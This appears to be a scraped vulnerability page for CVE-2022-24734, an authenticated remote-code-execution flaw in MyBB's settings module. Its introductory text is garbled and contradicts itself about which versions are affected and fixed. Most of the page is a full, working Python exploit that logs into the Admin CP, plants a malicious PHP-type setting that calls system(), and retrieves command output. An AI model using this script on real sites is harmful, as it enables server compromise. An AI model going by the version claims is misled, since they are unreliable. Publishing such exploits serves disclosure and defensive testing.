In versions prior to 1.8.30, MyBB's Settings module allows adding settings of type php, with PHP code executed on Change Settings pages. This results in a RCE vulnerability, since the code can be used to perform any action depending on the php code. There are no known workarounds. The vulnerability is present in all MyBB 1.8.x versions, including the official release 1.8.30. In all MyBB 1.8.x versions, and in all versions prior to 1.8.30, the Settings management module allows adding settings of type php, with PHP code executed on Change Settings pages. This results in a RCE vulnerability, since the code can be used to perform any action depending on the php code. There are no known workarounds. The vulnerability is present in all MyBB 1.8.x versions, including the official release 1.8.30. What's Fixed in MyBB 1.8.30? The Settings management module was fixed in 1.8.30. Note that this does not affect users with the 1.8.x releases prior to 1.8.30. What's Fixed in MyBB 1.2.0? - In all MyBB 1.2.x versions, and in all versions prior to 1.2.0 (including the official release 1.2.0), the Settings management module allows adding settings of type php, with PHP code executed on Change Settings
Overview
The vulnerability is present in all MyBB 1.8.x versions, including the official release 1.8.30 and earlier versions. All MyBB 1.8.x versions are affected, as well as all MyBB 1.2.x versions and earlier releases
What are the risks of using MyBB?
The Settings management module was fixed in 1.8.30. Note that this does not affect users with the 1.8.x releases prior to 1.8.30
Exploit
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29
# Tested on: Linux
# CVE : CVE-2022-24734
# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting.
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f)
import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup
def login(username, password):
data = {
"username" : username,
"password" : password,
"do" : "login"
}
login_txt = r_client.post(host + "/admin/index.php", data=data).text
if "The username and password combination you entered is invalid" in login_txt:
print("[-] Login failure. Incorrect credentials supplied")
exit(0)
print("[+] Login successful!")
def add_settings(cmd, raw_cmd=""):
config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text
if "Access Denied" in config_settings_txt:
print("[-] Supplied user doesn't have the rights to add a setting")
exit(0)
print("[*] Adding a malicious settings...")
soup = BeautifulSoup(config_settings_txt, "lxml")
my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']
rand_string = get_rand_string()
if raw_cmd != "":
extra = "\" . system('{}') .\"".format(raw_cmd)
else:
extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)
data = {
"my_post_key" : my_post_key,
"title" : "An innocent setting",
"description" : "An innocent description",
"gid" : 1,
"disporder" : "",
"name" : rand_string,
"type" : "\tphp",
"extra" : extra,
"value" : "An innocent value"
}
post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)
if post_setting.status_code != 302:
soup = BeautifulSoup(post_setting.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
exit(0)
print("[+] Malicious post settings accepted!")
return rand_string
def get_rand_string(length=20):
return ''.join(random.choice(string.ascii_letters) for i in range(length))
def get_cmd_result(ident_string, raw_cmd=""):
conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text
soup = BeautifulSoup(conf_settings_list, "lxml")
row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]
cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text
if raw_cmd == "":
cmd_result = b64decode(cmd_result[2:]).decode()
print("[+] Result: {}".format(str(cmd_result)))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()
username = args.username
password = args.password
host = args.host
cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd
r_client = requests.Session()
login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)Timeline
Published on: 03/09/2022 22:15:00 UTC
Last modified on: 06/02/2022 14:15:00 UTC
References
- https://mybb.com/versions/1.8.30/
- https://github.com/mybb/mybb/commit/92012b9831b330714b9f9b4646a98784113489c1
- https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f
- https://www.zerodayinitiative.com/advisories/ZDI-22-503/
- http://packetstormsecurity.com/files/167082/MyBB-1.8.29-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/167333/MyBB-Admin-Control-Remote-Code-Execution.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24734